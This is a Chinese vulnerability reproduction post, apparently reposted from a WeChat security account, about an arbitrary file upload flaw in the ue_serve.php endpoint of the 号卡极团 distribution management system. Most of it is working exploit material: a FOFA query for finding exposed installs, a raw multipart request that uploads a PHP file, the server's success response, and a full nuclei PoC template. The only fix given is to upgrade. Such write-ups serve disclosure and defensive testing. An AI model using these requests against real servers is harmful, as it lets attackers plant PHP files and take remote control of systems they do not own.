01 漏洞名称
02 漏洞影响
号卡极团分销管理系统
03 漏洞描述
号卡极团分销管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,首页多套U+商品下单页多套模板,订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定,内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接。该系统ue_serve.php接口处存在任意文件上传漏洞,会导致系统会被黑客远控。
04 FOFA搜索语句
icon_hash
=
"-795291075"
05 漏洞复现
第一步,向靶场发送如下数据包,上传文件
POST
/admin/controller/ue_serve.php?action=image&encode=utf-8
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection
: close
Content-Length
: 293
Accept
: */*
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Content-Type
: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-
data
; name=
"name"
1
.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-
data
; name=
"upfile"
; filename=
"1.php"
Content-Type: image/jpeg
rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
响应内容如下
HTTP/1.1
200
OK
Connection
: close
Transfer-Encoding
: chunked
Content-Type
: application/json
Date
: Wed, 22 May 2024 08:07:20 GMT
Server
: nginx
{
"state"
:
"SUCCESS"
,
"url"
:
"http://x.x.x.x./upload/8392a7b866140_1.php"
}
第二步,访问回显文件
漏洞复现成功
06 nuclei poc
poc文件内容如下
id
: haoka-ue_serve-fileupload
info
:
name
:
号卡极团分销管理系统 ue_serve.php 任意文件上传漏洞
author
:
fgz
severity
:
critical
description
:
号卡极团分销管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,首页多套U+商品下单页多套模板,订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定,内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接!该系统ue_serve.php接口处存在任意文件上传漏洞,会导致系统会被黑客远控。
metadata
:
:
1
:
icon_hash="-795291075"
verified
:
true
variables
:
file_name
:
"{{to_lower(rand_text_alpha(8))}}"
file_content
:
"{{to_lower(rand_text_alpha(20))}}"
rboundary
:
"{{to_lower(rand_text_alpha(32))}}"
requests
:
raw:
|+
POST
/admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
:
multipart/form-data; boundary=----{{rboundary}}
Accept
:
*/*
:
gzip, deflate
:
zh-CN,zh;q=0.9
------{{rboundary}}
:
form-data; name="name"
1.php
------{{rboundary}}
:
form-data; name="upfile"; filename="1.php"
:
image/jpeg
{{file_content}}
------{{rboundary}}--
|
GET
{{name}} HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
:
gzip
extractors
:
type: json
part
:
body
name
:
name
json
:
'.url'
internal
:
true
matchers
:
type: dsl
dsl
:
"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
07 修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):【在野】号卡极团分销管理系统 ue_serve.php 任意文件上传漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论